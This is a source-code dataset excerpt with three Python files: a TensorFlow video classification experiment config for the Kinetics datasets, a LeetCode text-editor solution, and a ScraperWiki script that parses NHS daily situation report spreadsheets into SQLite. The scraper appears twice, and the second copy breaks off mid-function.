"Apache-2.0"
] | permissive | jyshin0926/models | 4b0c107ca4170992e8a26370414a950413a59904 | 02574bc3dfbbf913c13937865e6609f4a0be3dc9 | refs/heads/master | 2023-03-28T09:12:50.138751 | 2021-03-23T00:53:09 | 2021-03-23T00:53:09 | 350,530,029 | 2 | 0 | Apache-2.0 | 2021-03-23T00:27:57 | 2021-03-23T00:27:57 | null | UTF-8 | Python | false | false | 8,565 | py | # Lint as: python3
# Copyright 2020 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Video classification configuration definition."""
from typing import Optional, Tuple
import dataclasses
from official.core import config_definitions as cfg
from official.core import exp_factory
from official.modeling import hyperparams
from official.modeling import optimization
from official.vision.beta.configs import backbones_3d
from official.vision.beta.configs import common
@dataclasses.dataclass
class DataConfig(cfg.DataConfig):
"""The base configuration for building datasets."""
name: Optional[str] = None
file_type: Optional[str] = 'tfrecord'
compressed_input: bool = False
split: str = 'train'
feature_shape: Tuple[int, ...] = (64, 224, 224, 3)
temporal_stride: int = 1
num_test_clips: int = 1
num_test_crops: int = 1
num_classes: int = -1
num_channels: int = 3
num_examples: int = -1
global_batch_size: int = 128
num_devices: int = 1
data_format: str = 'channels_last'
dtype: str = 'float32'
one_hot: bool = True
shuffle_buffer_size: int = 64
cache: bool = False
input_path: str = ''
is_training: bool = True
cycle_length: int = 10
drop_remainder: bool = True
min_image_size: int = 256
is_multilabel: bool = False
output_audio: bool = False
audio_feature: str = ''
audio_feature_shape: Tuple[int, ...] = (-1,)
aug_min_aspect_ratio: float = 0.5
aug_max_aspect_ratio: float = 2.0
aug_min_area_ratio: float = 0.49
aug_max_area_ratio: float = 1.0
def kinetics400(is_training):
"""Generated Kinectics 400 dataset configs."""
return DataConfig(
name='kinetics400',
num_classes=400,
is_training=is_training,
split='train' if is_training else 'valid',
drop_remainder=is_training,
num_examples=215570 if is_training else 17706,
feature_shape=(64, 224, 224, 3) if is_training else (250, 224, 224, 3))
def kinetics600(is_training):
"""Generated Kinectics 600 dataset configs."""
return DataConfig(
name='kinetics600',
num_classes=600,
is_training=is_training,
split='train' if is_training else 'valid',
drop_remainder=is_training,
num_examples=366016 if is_training else 27780,
feature_shape=(64, 224, 224, 3) if is_training else (250, 224, 224, 3))
@dataclasses.dataclass
class VideoClassificationModel(hyperparams.Config):
"""The model config."""
model_type: str = 'video_classification'
backbone: backbones_3d.Backbone3D = backbones_3d.Backbone3D(
type='resnet_3d', resnet_3d=backbones_3d.ResNet3D50())
norm_activation: common.NormActivation = common.NormActivation(
use_sync_bn=False)
dropout_rate: float = 0.2
aggregate_endpoints: bool = False
@dataclasses.dataclass
class Losses(hyperparams.Config):
one_hot: bool = True
label_smoothing: float = 0.0
l2_weight_decay: float = 0.0
@dataclasses.dataclass
class VideoClassificationTask(cfg.TaskConfig):
"""The task config."""
model: VideoClassificationModel = VideoClassificationModel()
train_data: DataConfig = DataConfig(is_training=True, drop_remainder=True)
validation_data: DataConfig = DataConfig(
is_training=False, drop_remainder=False)
losses: Losses = Losses()
def add_trainer(experiment: cfg.ExperimentConfig,
train_batch_size: int,
eval_batch_size: int,
learning_rate: float = 1.6,
train_epochs: int = 44,
warmup_epochs: int = 5):
"""Add and config a trainer to the experiment config."""
if experiment.task.train_data.num_examples <= 0:
raise ValueError('Wrong train dataset size {!r}'.format(
experiment.task.train_data))
if experiment.task.validation_data.num_examples <= 0:
raise ValueError('Wrong validation dataset size {!r}'.format(
experiment.task.validation_data))
experiment.task.train_data.global_batch_size = train_batch_size
experiment.task.validation_data.global_batch_size = eval_batch_size
steps_per_epoch = experiment.task.train_data.num_examples // train_batch_size
experiment.trainer = cfg.TrainerConfig(
steps_per_loop=steps_per_epoch,
summary_interval=steps_per_epoch,
checkpoint_interval=steps_per_epoch,
train_steps=train_epochs * steps_per_epoch,
validation_steps=experiment.task.validation_data.num_examples //
eval_batch_size,
validation_interval=steps_per_epoch,
optimizer_config=optimization.OptimizationConfig({
'optimizer': {
'type': 'sgd',
'sgd': {
'momentum': 0.9,
'nesterov': True,
}
},
'learning_rate': {
'type': 'cosine',
'cosine': {
'initial_learning_rate': learning_rate,
'decay_steps': train_epochs * steps_per_epoch,
}
},
'warmup': {
'type': 'linear',
'linear': {
'warmup_steps': warmup_epochs * steps_per_epoch,
'warmup_learning_rate': 0
}
}
}))
return experiment
@exp_factory.register_config_factory('video_classification')
def video_classification() -> cfg.ExperimentConfig:
"""Video classification general."""
return cfg.ExperimentConfig(
runtime=cfg.RuntimeConfig(mixed_precision_dtype='bfloat16'),
task=VideoClassificationTask(),
trainer=cfg.TrainerConfig(),
restrictions=[
'task.train_data.is_training != None',
'task.validation_data.is_training != None',
'task.train_data.num_classes == task.validation_data.num_classes',
])
@exp_factory.register_config_factory('video_classification_kinetics400')
def video_classification_kinetics400() -> cfg.ExperimentConfig:
"""Video classification on Kinectics 400 with resnet."""
train_dataset = kinetics400(is_training=True)
validation_dataset = kinetics400(is_training=False)
task = VideoClassificationTask(
model=VideoClassificationModel(
backbone=backbones_3d.Backbone3D(
type='resnet_3d', resnet_3d=backbones_3d.ResNet3D50()),
norm_activation=common.NormActivation(
norm_momentum=0.9, norm_epsilon=1e-5, use_sync_bn=False)),
losses=Losses(l2_weight_decay=1e-4),
train_data=train_dataset,
validation_data=validation_dataset)
config = cfg.ExperimentConfig(
runtime=cfg.RuntimeConfig(mixed_precision_dtype='bfloat16'),
task=task,
restrictions=[
'task.train_data.is_training != None',
'task.validation_data.is_training != None',
'task.train_data.num_classes == task.validation_data.num_classes',
])
add_trainer(config, train_batch_size=1024, eval_batch_size=64)
return config
@exp_factory.register_config_factory('video_classification_kinetics600')
def video_classification_kinetics600() -> cfg.ExperimentConfig:
"""Video classification on Kinectics 600 with resnet."""
train_dataset = kinetics600(is_training=True)
validation_dataset = kinetics600(is_training=False)
task = VideoClassificationTask(
model=VideoClassificationModel(
backbone=backbones_3d.Backbone3D(
type='resnet_3d', resnet_3d=backbones_3d.ResNet3D50()),
norm_activation=common.NormActivation(
norm_momentum=0.9, norm_epsilon=1e-5, use_sync_bn=False)),
losses=Losses(l2_weight_decay=1e-4),
train_data=train_dataset,
validation_data=validation_dataset)
config = cfg.ExperimentConfig(
runtime=cfg.RuntimeConfig(mixed_precision_dtype='bfloat16'),
task=task,
restrictions=[
'task.train_data.is_training != None',
'task.validation_data.is_training != None',
'task.train_data.num_classes == task.validation_data.num_classes',
])
add_trainer(config, train_batch_size=1024, eval_batch_size=64)
return config
| [
"gardener@tensorflow.org"
] | gardener@tensorflow.org |
093b8ea7593c9c1b921e251e644de80e43c8a9f9 | ae12996324ff89489ded4c10163f7ff9919d080b | /LeetCodePython/DesignaTextEditor.py | 3f9a03e8ddcfd31fcc7ef5243000df664c94c4e6 | [] | no_license | DeanHe/Practice | 31f1f2522f3e7a35dc57f6c1ae74487ad044e2df | 3230cda09ad345f71bb1537cb66124ec051de3a5 | refs/heads/master | 2023-07-05T20:31:33.033409 | 2023-07-01T18:02:32 | 2023-07-01T18:02:32 | 149,399,927 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 4,725 | py | """
Design a text editor with a cursor that can do the following:
Add text to where the cursor is.
Delete text from where the cursor is (simulating the backspace key).
Move the cursor either left or right.
When deleting text, only characters to the left of the cursor will be deleted. The cursor will also remain within the actual text and cannot be moved beyond it. More formally, we have that 0 <= cursor.position <= currentText.length always holds.
Implement the TextEditor class:
TextEditor() Initializes the object with empty text.
void addText(string text) Appends text to where the cursor is. The cursor ends to the right of text.
int deleteText(int k) Deletes k characters to the left of the cursor. Returns the number of characters actually deleted.
string cursorLeft(int k) Moves the cursor to the left k times. Returns the last min(10, len) characters to the left of the cursor, where len is the number of characters to the left of the cursor.
string cursorRight(int k) Moves the cursor to the right k times. Returns the last min(10, len) characters to the left of the cursor, where len is the number of characters to the left of the cursor.
Example 1:
Input
["TextEditor", "addText", "deleteText", "addText", "cursorRight", "cursorLeft", "deleteText", "cursorLeft", "cursorRight"]
[[], ["leetcode"], [4], ["practice"], [3], [8], [10], [2], [6]]
Output
[null, null, 4, null, "etpractice", "leet", 4, "", "practi"]
Explanation
TextEditor textEditor = new TextEditor(); // The current text is "|". (The '|' character represents the cursor)
textEditor.addText("leetcode"); // The current text is "leetcode|".
textEditor.deleteText(4); // return 4
// The current text is "leet|".
// 4 characters were deleted.
textEditor.addText("practice"); // The current text is "leetpractice|".
textEditor.cursorRight(3); // return "etpractice"
// The current text is "leetpractice|".
// The cursor cannot be moved beyond the actual text and thus did not move.
// "etpractice" is the last 10 characters to the left of the cursor.
textEditor.cursorLeft(8); // return "leet"
// The current text is "leet|practice".
// "leet" is the last min(10, 4) = 4 characters to the left of the cursor.
textEditor.deleteText(10); // return 4
// The current text is "|practice".
// Only 4 characters were deleted.
textEditor.cursorLeft(2); // return ""
// The current text is "|practice".
// The cursor cannot be moved beyond the actual text and thus did not move.
// "" is the last min(10, 0) = 0 characters to the left of the cursor.
textEditor.cursorRight(6); // return "practi"
// The current text is "practi|ce".
// "practi" is the last min(10, 6) = 6 characters to the left of the cursor.
Constraints:
1 <= text.length, k <= 40
text consists of lowercase English letters.
At most 2 * 104 calls in total will be made to addText, deleteText, cursorLeft and cursorRight.
hint:
1 Making changes in the middle of some data structures is generally harder than changing the front/back of the same data structure.
2 Can you partition your data structure (text with cursor) into two parts, such that each part changes only near its ends?
3 Can you think of a data structure that supports efficient removals/additions to the front/back?
4 Try to solve the problem with two deques by maintaining the prefix and the suffix separately.
"""
class TextEditor:
def __init__(self):
self.s = ""
self.cursor = 0
def addText(self, text: str) -> None:
self.s = self.s[:self.cursor] + text + self.s[self.cursor:]
self.cursor += len(text)
def deleteText(self, k: int) -> int:
cur = max(0, self.cursor - k)
delete_cnt = k if self.cursor - k >= 0 else self.cursor
self.s = self.s[:cur] + self.s[self.cursor:]
self.cursor = cur
return delete_cnt
def cursorLeft(self, k: int) -> str:
self.cursor = max(0, self.cursor - k)
start = max(0, self.cursor - 10)
return self.s[start:self.cursor]
def cursorRight(self, k: int) -> str:
self.cursor = min(len(self.s), self.cursor + k)
start = max(0, self.cursor - 10)
return self.s[start:self.cursor]
# Your TextEditor object will be instantiated and called as such:
# obj = TextEditor()
# obj.addText(text)
# param_2 = obj.deleteText(k)
# param_3 = obj.cursorLeft(k)
# param_4 = obj.cursorRight(k) | [
"tengda.he@gmail.com"
] | tengda.he@gmail.com |
610e9e0094ced115c64f5c06b9dbb9ab77bfc073 | 3d19e1a316de4d6d96471c64332fff7acfaf1308 | /Users/P/psychemedia/nhs_sit_reps_2011.py | e2234bd29ed70633306158127db3feacfd95e2e7 | [] | no_license | BerilBBJ/scraperwiki-scraper-vault | 4e98837ac3b1cc3a3edb01b8954ed00f341c8fcc | 65ea6a943cc348a9caf3782b900b36446f7e137d | refs/heads/master | 2021-12-02T23:55:58.481210 | 2013-09-30T17:02:59 | 2013-09-30T17:02:59 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 28,202 | py | #Scrape sit reports
#Reshape data from original format - dates are facet values, and as such row vals not column vals
#Dates are given in all manner of formats in the oroginal col headings; I've made a start on parsing them but there's still work to be done
#Need to build a table that contains scraped sheets so we don't scrape them again
#TO DO - I chose some really bad column names - to, from, table; need to change these really?
#import xlrd library - documentation at https://secure.simplistix.co.uk/svn/xlrd/trunk/xlrd/doc/xlrd.html
import xlrd
import md5
import time
from time import mktime
from datetime import datetime
import scraperwiki
import lxml.html
#UTILITY FUNCTION TO DROP TABLES
def dropper(table):
if table!='':
try: scraperwiki.sqlite.execute('drop table "'+table+'"')
except: pass
#---
#http://stackoverflow.com/a/1112664/454773
import datetime
def minimalist_xldate_as_datetime(xldate, datemode):
# datemode: 0 for 1900-based, 1 for 1904-based
return (
datetime.datetime(1899, 12, 30)
+ datetime.timedelta(days=xldate + 1462 * datemode)
)
#----
#Start of with a fudge - can we assume spreadsheets are templated, same each week?
def init():
templateURL='https://www.wp.dh.gov.uk/transparency/files/2012/10/DailySR-Pub-file-WE-11-11-123.xls'
xlbin = scraperwiki.scrape(templateURL)
#use the open_workbook function on that new variable to create another, 'book'
book = xlrd.open_workbook(file_contents=xlbin)
#Create a table that acts as a table directory
sheetnum=0
for sheetname in book.sheet_names():
sid='id_'+str(sheetnum)
data={'id':sid,'name':sheetname}
scraperwiki.sqlite.save(["id", "name"], data)
sheetnum=sheetnum+1
#init()
#exit(-1)
def tablePatch(bd):
bd2=[]
for r in bd:
if 'tid' not in r:
r['tid']= tableLookup[r['tableName']]
bd2.append(r.copy())
elif r['tid']=='':
r['tid']= tableLookup[r['tableName']]
bd2.append(r.copy())
return bd2
def maintenanceHack1():
tables=scraperwiki.sqlite.select("* from swdata")
fulltable=scraperwiki.sqlite.select("* from fulltable")
bigdata=[]
tid={}
for t in tables:
tid[t['name']]=t['id']
for r in fulltable:
if 'tid' not in r:
r['tid']=tid[r['tableName']]
bigdata.append(r.copy())
elif r['tid']=='':
r['tid']=tid[r['tableName']]
bigdata.append(r.copy())
if len(bigdata)>1000:
scraperwiki.sqlite.save(unique_keys=['id'],table_name='fulltable', data=bigdata,verbose = 0)
bigdata=[]
scraperwiki.sqlite.save(unique_keys=['id'],table_name='fulltable', data=bigdata,verbose = 0)
#maintenanceHack1()
def init2():
tables=scraperwiki.sqlite.select("* from swdata")
for t in tables:
dropper(t['id'])
dropper('fulltable')
#dropper('swdata')
#exit(-1)
#init2()
#exit(-1)
try:
tables=scraperwiki.sqlite.select("* from swdata")
except:
tables=[]
print tables
tableLookup={}
for t in tables:
tableLookup[t['name']]=t['id']
scrapedAlready=[]
try:
scrapedtables=scraperwiki.sqlite.select("* from scraped")
for t in scrapedtables:
scrapedAlready.append(t['url'])
except: pass
def simplifiedKey(key):
key=key.replace('/','.')
#still got bad key? ???in Cancelled operations ???
#replaced to and still broken:
# 16 18.11.2012
return key
dateLookup={}
def dateNormalise(d):
#This is a bit of a hack - each time we find new date formats for the cols, we'll need to extend this
#For pattern matching strings, see http://www.tutorialspoint.com/python/time_strptime.htm
for trials in ["%d %b %y","%d %b%y",'%d-%b-%y','%d-%b-%Y','%d/%m/%Y','%d/%m/%y','%d %b %Y','%d-%m-%Y','%d/%m%Y']:
try:
d=d.strip()
dtf =datetime.datetime.fromtimestamp(mktime(time.strptime(d, trials)))
break
except:
dtf=d
if type(dtf) is datetime.datetime:
dtf=dtf.strftime("%Y-%m-%d")
return dtf
def patchDate(f,t):
tt=t.split('-')
ff=f.split('-')
f=int(ff[0])
#how to cope with month rollover
if int(tt[2])<int(f):
#so we have a month change
tt[1]=int(tt[1])-1
#There may ne an issue at year rollover but we have to see how that is represented...
if int(tt[1])==0:
print 'weekend rollover at year end - how have they represented the dates?'
tt[0]=int(tt[0])-1
tt[1]=12
#exit(-1)
fromdate='-'.join( [ str(tt[0]),str(tt[1]),str(f) ])
dtf=datetime.datetime.fromtimestamp(mktime(time.strptime(fromdate, "%Y-%m-%d")))
if type(dtf) is datetime.datetime:
fromdate=dtf.strftime("%Y-%m-%d")
else:
print dtf
exit(-1)
return fromdate
def dateRangeParse(daterange):
#----
#HORRIBLE HACK to cope with 02/122012
#-->handle in the trials parse pattern
#=daterange.replace('122012','12/2012')
#----
dd=daterange.split(' to ')
if len(dd)<2:
dd2=daterange.split(' - ')
if len(dd2)<2:
fromdate=daterange
todate=daterange
else:
fromdate=dd2[0]
todate=dd2[1]
else:
fromdate=dd[0]
todate=dd[1]
todate=dateNormalise(todate)
#I think we'll require another fudge here, eg if date is given as '6 to 8 Nov 2012' we'll need to finesse '6' to '6 Nov 2012'
fromdate=dateNormalise(fromdate)
#if len(fromdate)<3:
try:
datetime.datetime.fromtimestamp(mktime(time.strptime(fromdate, "%Y-%m-%d")))
except:
fromdate=patchDate(fromdate,todate)
return (fromdate,todate)
def scrapesheets3(XLS):
xlbin = scraperwiki.scrape(XLS)
book = xlrd.open_workbook(file_contents=xlbin)
print book.sheet_names()
for sheetname in book.sheet_names():
bigdata=[]
if sheetname in tableLookup:
tt=tableLookup[sheetname]
#If we want to clear the tables...
#dropper(tt)
else:
l=len(tableLookup)
sid='id_'+str(l)
tableLookup[sheetname]=sid
scraperwiki.sqlite.save(["id", "name"], {'id':sid,'name':sheetname} )
tt=tableLookup[sheetname]
#exit(-1) #crash out for now...
print 'Tablename:',tt
sheet = book.sheet_by_name(sheetname)
sheetwidth=len(sheet.row_values(17))
print sheetname,sheetwidth,sheet.nrows
keys={}
facetAkeys={}
tokeys={}
fromkeys={}
facetBkeys={}
for col in range(1,4):
keys[col]=sheet.row_values(14)[col]
lastfacetAkey=-1
if sheet.row_values(13)[5]!='' or sheet.row_values(13)[4]!='':
for col in range (4,sheetwidth):
if sheet.row_values(13)[col]!='':
try:
facetAkeys[col]=minimalist_xldate_as_datetime(sheet.row_values(13)[col],book.datemode).date().strftime("%Y-%m-%d")
except:
facetAkeys[col]=sheet.row_values(13)[col]
lastfacetAkey=facetAkeys[col]
else:
facetAkeys[col]=lastfacetAkey
if facetAkeys[col] not in dateLookup:
(fromkeys[col],tokeys[col])=dateRangeParse(facetAkeys[col])
dateLookup[facetAkeys[col]]=(fromkeys[col],tokeys[col])
else:
(fromkeys[col],tokeys[col])=dateLookup[facetAkeys[col]]
facetBkeys[col]=sheet.row_values(14)[col]
else:
for col in range (4,sheetwidth):
try:
facetAkeys[col]=minimalist_xldate_as_datetime(sheet.row_values(14)[col],book.datemode).date().strftime("%Y-%m-%d")
#It may make more sense to save this as a proper date - in which case just drop the strftime bit
#facetAkeys[col]=minimalist_xldate_as_datetime(sheet.row_values(14)[col],book.datemode).date()
#As query in https://scraperwiki.com/views/ou_bbc_co-pro_on_iplayer_-_bootstrap/ shows, we can do time based SQLite queries?
#TO DO? Some of the facetAkeys are date ranges, so maybe bettwe to split as facetAkeysFrom and facetAkeysTo?
##If it's not a range, set from and to as the same.
except:
facetAkeys[col]=sheet.row_values(14)[col]
if facetAkeys[col] not in dateLookup:
(fromkeys[col],tokeys[col])=dateRangeParse(facetAkeys[col])
dateLookup[facetAkeys[col]]=(fromkeys[col],tokeys[col])
else:
(fromkeys[col],tokeys[col])=dateLookup[facetAkeys[col]]
facetBkeys[col]=''
#print fromkeys
for row in range(17, sheet.nrows):
data={}
#hack fudge error trap
if sheet.row_values(row)[2]=='':continue
for col in range(1,4):
#these are typically ['SHA','Code','Name',]
data[keys[col]]=sheet.row_values(row)[col]
for col in range (4,sheetwidth):
#TO DO - change colhead to tableName
#data['table']=sheetname
data['tableName']=sheetname
data['facetA']=facetAkeys[col]
#TO DO - change colhead to fromDateStr
#data['from']=fromkeys[col]
data['fromDateStr']=fromkeys[col]
#TO DO - change colhead to toDateStr
#data['to']=tokeys[col]
data['toDateStr']=tokeys[col]
data['facetB']=facetBkeys[col]
data["value"]=sheet.row_values(row)[col]
data['id']=md5.new(''.join([ data['tableName'],data['Code'],data['fromDateStr'],data['facetB'] ])).hexdigest()
#scraperwiki.sqlite.save(unique_keys=['id'],table_name=tt, data=data)
#If we get properly unique keys - uniqid - eg as in hash idea above but also adding tt into hash mix, we can do a fulltable?
#scraperwiki.sqlite.save(unique_keys=['id'],table_name='fulltable', data=data,verbose = 0)
#If data variable persists, the pass by reference append of the data dict breaks bigdata; so force append by value instead
bigdata.append(data.copy())
if len(bigdata)>1000:
scraperwiki.sqlite.save(unique_keys=['id'],table_name=tt, data=bigdata,verbose = 0)
#scraperwiki.sqlite.save(unique_keys=['id'],table_name='fulltable', data=tablePatch(bigdata),verbose = 0)
bigdata=[]
#Tidy up by saving any data that's left outstanding
scraperwiki.sqlite.save(unique_keys=['id'],table_name=tt, data=bigdata,verbose = 0)
#scraperwiki.sqlite.save(unique_keys=['id'],table_name='fulltable', data=tablePatch(bigdata),verbose = 0)
bigdata=[]
scraperwiki.sqlite.save(unique_keys=['url'],table_name='scraped', data={'url':XLS})
#TESTING
#scrapesheets2('https://www.wp.dh.gov.uk/transparency/files/2012/10/DailySR-Web-file-WE-18-11-12.xls')
#scrapesheets3('https://www.wp.dh.gov.uk/transparency/files/2012/10/DailySR-Web-file-WE-18-11-12.xls')
#From a scraper by paulbradshaw
#define our URL - this links to all the spreadsheets
#URL = 'http://transparency.dh.gov.uk/2012/10/26/winter-pressures-daily-situation-reports-2012-13/'
URL='http://www.dh.gov.uk/en/Publicationsandstatistics/Statistics/Performancedataandstatistics/DailySituationReports/index.htm'
#HTML to grab is:
#<p><strong>November 2012</strong><br />
#<a href="https://www.wp.dh.gov.uk/transparency/files/2012/10/DailySR-Web-file-WE-18-11-12.xls">DailySR – week ending 18 Nov 12.xls (492KB).</a><br />
#<a href="https://www.wp.dh.gov.uk/transparency/files/2012/10/DailySR-Pub-file-WE-11-11-123.xls">DailySR – 6 Nov 12 to 11 Nov 12.xls (446KB)</a>.</p>
#HTML to avoid that generates an error is:
#<p>Data for this collection is available back to November 2010.<br />
#For previous years’ data <a #href="http://www.dh.gov.uk/en/Publicationsandstatistics/Statistics/Performancedataandstatistics/DailySituationReports/index.htm">click here</a>.</p>
#Create a new function which takes one parameter and names it 'URL'
def grabexcellinks(URL):
#Use Scraperwiki's scrape function on 'URL', put results in new variable 'html'
html = scraperwiki.scrape(URL)
#and show it us
print html
#Use lxml.html's fromstring function on 'html', put results in new variable 'root'
root = lxml.html.fromstring(html)
#use cssselect method on 'root' to grab all <a> tags within a <p> tag - and put in a new list variable 'links'
links = root.cssselect('p a')
#for each item in that list variable, from the first to the second last [0:-1], put it in the variable 'link'
'''
for link in links[0:-1]:
#and print the text_content of that (after the string "link text:")
print "link text:", link.text_content()
#use the attrib.get method on 'link' to grab the href= attribute of the HTML, and put in new 'linkurl' variable
linkurl = link.attrib.get('href')
#print it
print linkurl
#run the function scrapesheets, using that variable as the parameter
scrapesheets(linkurl)
'''
urls=[]
for link in links[0:-1]: urls.append(link.attrib.get('href'))
return urls
#grabexcellinks(URL)
#--
#urls= grabexcellinks(URL)
#I'm starting to think - is the first sheet all the data to date?
#In which case, we probably need to avoid scraping this one if we're doing weekly updates
# NOTE(review): `urls` is reset to an empty list here and the grabexcellinks()
# call above is commented out, so the loop below is currently dead code --
# only the hard-coded workbook after it is fetched. Confirm this was a
# deliberate switch-off before re-enabling the index-page scrape.
urls=[]
for url in urls[1:]:
    if url not in scrapedAlready:
        print url
        scrapesheets3(url)
    else: print "Ignoring",url
# Directly ingest one specific sitrep workbook.
scrapesheets3('http://www.dh.gov.uk/prod_consum_dh/groups/dh_digitalassets/@dh/@en/@ps/@sta/@perf/documents/digitalasset/dh_132988.xls')
#Scrape sit reports
#Reshape data from original format - dates are facet values, and as such row vals not column vals
#Dates are given in all manner of formats in the oroginal col headings; I've made a start on parsing them but there's still work to be done
#Need to build a table that contains scraped sheets so we don't scrape them again
#TO DO - I chose some really bad column names - to, from, table; need to change these really?
#import xlrd library - documentation at https://secure.simplistix.co.uk/svn/xlrd/trunk/xlrd/doc/xlrd.html
import xlrd
import md5
import time
from time import mktime
from datetime import datetime
import scraperwiki
import lxml.html
#UTILITY FUNCTION TO DROP TABLES
def dropper(table):
    """Drop the named SQLite table if it exists; ignore every failure."""
    if table == '':
        return
    try:
        scraperwiki.sqlite.execute('drop table "' + table + '"')
    except:
        pass
#---
#http://stackoverflow.com/a/1112664/454773
import datetime
def minimalist_xldate_as_datetime(xldate, datemode):
    """Convert an Excel serial date number to a datetime.

    ``datemode`` is 0 for 1900-based workbooks and 1 for 1904-based ones;
    the 1904 epoch trails the 1900 epoch by 1462 days.
    """
    epoch = datetime.datetime(1899, 12, 30)
    offset = datetime.timedelta(days=xldate + 1462 * datemode)
    return epoch + offset
#----
#Start of with a fudge - can we assume spreadsheets are templated, same each week?
def init():
    # One-off bootstrap, assuming every weekly workbook follows this template:
    # register each of its sheet names in the sheet directory, keyed
    # 'id_0', 'id_1', ...
    templateURL='https://www.wp.dh.gov.uk/transparency/files/2012/10/DailySR-Pub-file-WE-11-11-123.xls'
    xlbin = scraperwiki.scrape(templateURL)
    # Open the downloaded bytes as a workbook.
    book = xlrd.open_workbook(file_contents=xlbin)
    for sheetnum, sheetname in enumerate(book.sheet_names()):
        scraperwiki.sqlite.save(["id", "name"],
                                {'id': 'id_' + str(sheetnum), 'name': sheetname})
#init()
#exit(-1)
def tablePatch(bd):
    # Return copies of the rows in bd whose 'tid' (table id) is missing or
    # blank, after filling it in from the global tableLookup. Rows that
    # already carry a non-empty 'tid' are omitted from the result.
    patched = []
    for row in bd:
        if row.get('tid', '') == '':
            row['tid'] = tableLookup[row['tableName']]
            patched.append(row.copy())
    return patched
def maintenanceHack1():
    # One-off repair pass: back-fill the 'tid' (table id) column on rows in
    # 'fulltable' that predate that column, using the sheet directory held
    # in 'swdata'. Rows that already have a non-empty tid are left alone
    # (they are never re-saved).
    tables=scraperwiki.sqlite.select("* from swdata")
    fulltable=scraperwiki.sqlite.select("* from fulltable")
    bigdata=[]
    # Map sheet name -> table id.
    tid={}
    for t in tables:
        tid[t['name']]=t['id']
    for r in fulltable:
        if 'tid' not in r:
            r['tid']=tid[r['tableName']]
            bigdata.append(r.copy())
        elif r['tid']=='':
            r['tid']=tid[r['tableName']]
            bigdata.append(r.copy())
        # Flush in batches of ~1000 rows to keep memory bounded.
        if len(bigdata)>1000:
            scraperwiki.sqlite.save(unique_keys=['id'],table_name='fulltable', data=bigdata,verbose = 0)
            bigdata=[]
    # Save any remainder left in the final partial batch.
    scraperwiki.sqlite.save(unique_keys=['id'],table_name='fulltable', data=bigdata,verbose = 0)
#maintenanceHack1()
def init2():
    # Destructive reset: drop every per-sheet table listed in the sheet
    # directory, plus the combined 'fulltable'.
    for entry in scraperwiki.sqlite.select("* from swdata"):
        dropper(entry['id'])
    dropper('fulltable')
    #dropper('swdata')
#dropper('swdata')
#exit(-1)
#init2()
#exit(-1)
try:
    tables=scraperwiki.sqlite.select("* from swdata")
except:
    # First run: the sheet directory does not exist yet.
    tables=[]
print tables
# Map sheet name -> per-sheet table id (e.g. 'id_3').
tableLookup={}
for t in tables:
    tableLookup[t['name']]=t['id']
# Workbook URLs already ingested, so reruns can skip them.
scrapedAlready=[]
try:
    scrapedtables=scraperwiki.sqlite.select("* from scraped")
    for t in scrapedtables:
        scrapedAlready.append(t['url'])
except: pass
def simplifiedKey(key):
    """Make a column heading safe for use as a SQLite column name by
    swapping '/' for '.'."""
    #still got bad key? ???in Cancelled operations ???
    #replaced to and still broken:
    # 16 18.11.2012
    return key.replace('/', '.')
# Cache of parsed column headings: heading string -> (fromDateStr, toDateStr).
dateLookup={}
def dateNormalise(d):
    """Normalise a column-heading date string to 'YYYY-MM-DD'.

    The workbook headings use many ad-hoc formats; each candidate pattern
    is tried in turn and the first one that parses wins.  If nothing
    matches (or ``d`` is not a string at all) the value is returned
    unchanged, so the caller can fall back on patchDate().
    """
    try:
        d = d.strip()
    except AttributeError:
        # Not a string (e.g. a raw numeric cell value): nothing to parse.
        return d
    # Extend this list whenever the source workbooks invent a new format.
    # For pattern syntax see the strftime/strptime format-code table in the
    # Python datetime docs.
    for trial in ["%d %b %y", "%d %b%y", '%d-%b-%y', '%d-%b-%Y', '%d/%m/%Y',
                  '%d/%m/%y', '%d %b %Y', '%d-%m-%Y', '%d/%m%Y']:
        try:
            # Parse with strptime directly: unlike the previous
            # fromtimestamp(mktime(...)) round-trip this cannot shift across
            # DST boundaries and also works for pre-1970 dates.
            return datetime.datetime.strptime(d, trial).strftime("%Y-%m-%d")
        except ValueError:
            continue
    return d
def patchDate(f,t):
    # Rebuild a parseable from-date when the heading only supplied a bare
    # day number: e.g. the range '6 to 8 Nov 2012' leaves f='6' while t has
    # already been normalised to '2012-11-08'. Year and month are borrowed
    # from t.
    tt=t.split('-')
    ff=f.split('-')
    f=int(ff[0])
    #how to cope with month rollover: if the from-day is larger than the
    #to-day (e.g. '30 Nov to 2 Dec'), the range straddled a month boundary.
    if int(tt[2])<int(f):
        #so we have a month change
        tt[1]=int(tt[1])-1
        #There may be an issue at year rollover but we have to see how that is represented...
        if int(tt[1])==0:
            print 'weekend rollover at year end - how have they represented the dates?'
            tt[0]=int(tt[0])-1
            tt[1]=12
            #exit(-1)
    fromdate='-'.join( [ str(tt[0]),str(tt[1]),str(f) ])
    # Round-trip through strptime/mktime to validate the rebuilt date and
    # re-emit it zero-padded.
    dtf=datetime.datetime.fromtimestamp(mktime(time.strptime(fromdate, "%Y-%m-%d")))
    if type(dtf) is datetime.datetime:
        fromdate=dtf.strftime("%Y-%m-%d")
    else:
        # Should be unreachable; bail out loudly if parsing went wrong.
        print dtf
        exit(-1)
    return fromdate
def dateRangeParse(daterange):
    """Split a heading like '6 Nov 2012 to 11 Nov 2012' into a normalised
    (fromdate, todate) pair; a single date yields the same value twice."""
    # Headings separate ranges with either ' to ' or ' - '.
    for separator in (' to ', ' - '):
        pieces = daterange.split(separator)
        if len(pieces) >= 2:
            fromdate, todate = pieces[0], pieces[1]
            break
    else:
        # Not a range: both ends collapse to the single value.
        fromdate = daterange
        todate = daterange
    # Normalise the end date first: a bare-day start such as '6' needs a
    # finished end date to borrow its month and year from.
    todate = dateNormalise(todate)
    fromdate = dateNormalise(fromdate)
    try:
        datetime.datetime.fromtimestamp(mktime(time.strptime(fromdate, "%Y-%m-%d")))
    except:
        # fromdate did not normalise to YYYY-MM-DD; rebuild it from todate.
